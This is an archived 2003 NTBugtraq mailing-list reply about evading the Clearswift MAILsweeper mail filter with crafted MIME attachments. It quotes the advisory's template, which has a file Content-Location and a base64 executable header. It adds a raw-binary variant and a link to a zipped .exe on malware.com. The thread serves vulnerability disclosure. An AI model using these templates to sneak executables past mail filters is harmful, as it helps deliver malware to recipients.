Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue

• Previous message: Paul Robichaux: "Free sample chapters from MS Exchange security book"
• Maybe in reply to: Martin O'Neal: "Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Sat, 8 Mar 2003 16:41:29 -0000
From: "http-equiv@excite.com" <http-equiv@MALWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

<!--

Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and paste
in:

     MIME-Version: 1.0
     Content-Location:file:///executable.exe
     Content-Transfer-Encoding: base64

     TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 -->

That's a very interesting situation with content filters and anti-
virus filters. How many others are affected one must wonder.

Try the following as well, nothing more than pure binary:

http://www.malware.com/bin.exe.zip

MIME-Version: 1.0
Content-Location:file://foo.exe
Content-Transfer-Encoding: binary

MZD ! ÿÿu ™ > û0jr y
ž

Lot more where that came from.

End Call

--
http://www.malware.com
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Have you discovered a security vulnerability related to Windows or a
commercial product which runs on Windows?
Need assistance crafting the format or translating your advisory to English?
Need to verify it, or having problems contacting the Vendor?
Contact mailto:Advisories@NTBugtraq.com
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

• Previous message: Paul Robichaux: "Free sample chapters from MS Exchange security book"
• Maybe in reply to: Martin O'Neal: "Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]